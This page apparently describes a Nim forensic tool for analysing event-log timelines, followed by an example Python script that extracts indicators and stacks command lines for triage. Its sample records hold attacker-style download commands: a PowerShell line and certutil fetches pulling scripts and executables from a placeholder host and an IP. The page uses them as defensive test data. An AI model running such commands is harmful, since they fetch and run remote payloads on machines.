
Features

  • Written in Nim, so it is easy to program, memory safe, as fast as native C code, and ships as a single standalone binary on any OS.
  • Print the process tree of a malicious process.
  • Split up CSV and JSONL timelines.
  • Extract IP addresses, domains, hashes, etc. for use with VirusTotal lookups.
  • VirusTotal lookups of domains, hashes and IP addresses.
  • List .evtx files that are not yet detected by any rule.
  • Visualize TTPs with heatmaps in MITRE ATT&CK Navigator.
  • Stacking of command lines, DNS requests, logons, processes, services, tasks, etc.
  • Timelines for logons, USB usage, suspicious processes, tasks, etc.
  • HTML summary reports
  • Many more!
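As an added illustration of two of the features above (IOC extraction and stacking), the script below walks JSONL timeline records, pulls out IPv4 addresses, domains and MD5/SHA1/SHA256 hashes with counts, and stacks a chosen field (here the command line) so that rare values stand out. This is example code written for this page, not the project's own implementation: the record layout (`Details.Cmdline`, `Details.Hash`) and the sample lines are constructed assumptions, and the domain filter is a simple extension denylist to keep filenames such as `a.exe` from being reported as domains.

```python
import json
import re
from collections import Counter
from typing import Iterator

# Constructed sample JSONL records (assumed layout, not real tool output).
SAMPLE_JSONL = """\
{"Timestamp":"2024-01-01T10:00:00Z","Computer":"WS01","Details":{"Cmdline":"powershell -enc aGk= http://evil.example.com/x.ps1"}}
{"Timestamp":"2024-01-01T10:00:05Z","Computer":"WS01","Details":{"Cmdline":"certutil -urlcache -f http://10.0.0.5/a.exe a.exe","Hash":"d41d8cd98f00b204e9800998ecf8427e"}}
{"Timestamp":"2024-01-01T10:00:09Z","Computer":"WS02","Details":{"Cmdline":"certutil -urlcache -f http://10.0.0.5/a.exe a.exe"}}
{"Timestamp":"2024-01-01T10:01:00Z","Computer":"WS02","Details":{"Cmdline":"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs"}}
"""

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
# Longest alternative first so a SHA256 is not reported as a SHA1 prefix.
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.I)
# Filename suffixes that look like TLDs; extend as needed (assumption).
NOT_TLDS = {"exe", "dll", "ps1", "bat", "cmd", "txt", "log", "vbs", "js", "sys", "zip"}


def iter_strings(obj) -> Iterator[str]:
    """Yield every string value in a nested JSON object."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from iter_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from iter_strings(v)


def parse_jsonl(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def valid_ipv4(s: str) -> bool:
    return all(int(o) <= 255 for o in s.split("."))


def extract_iocs(jsonl_text: str) -> dict:
    """Return Counters of IPs, domains and hashes found across all records."""
    iocs = {"ip": Counter(), "domain": Counter(), "hash": Counter()}
    for rec in parse_jsonl(jsonl_text):
        for s in iter_strings(rec):
            for m in IPV4_RE.finditer(s):
                if valid_ipv4(m.group(0)):
                    iocs["ip"][m.group(0)] += 1
            for m in DOMAIN_RE.finditer(s):
                dom = m.group(0).lower()
                if dom.rsplit(".", 1)[-1] not in NOT_TLDS:
                    iocs["domain"][dom] += 1
            for m in HASH_RE.finditer(s):
                iocs["hash"][m.group(0).lower()] += 1
    return iocs


def stack_field(jsonl_text: str, path: tuple) -> Counter:
    """Count occurrences of the value at `path` (e.g. ("Details","Cmdline"))."""
    counts = Counter()
    for rec in parse_jsonl(jsonl_text):
        node = rec
        for key in path:
            node = node.get(key) if isinstance(node, dict) else None
            if node is None:
                break
        if isinstance(node, str):
            counts[node] += 1
    return counts


if __name__ == "__main__":
    for kind, counter in extract_iocs(SAMPLE_JSONL).items():
        for value, n in counter.most_common():
            print(f"{kind:7} {n:3}  {value}")
    print()
    # Least common command lines first: rare entries are the ones to triage.
    for cmd, n in reversed(stack_field(SAMPLE_JSONL, ("Details", "Cmdline")).most_common()):
        print(f"{n:3}  {cmd}")
```

The extractor scans every string in a record rather than one field, so hashes placed in a dedicated field and IPs embedded in a command line are both caught; feed the resulting values to a VirusTotal lookup step of your choosing.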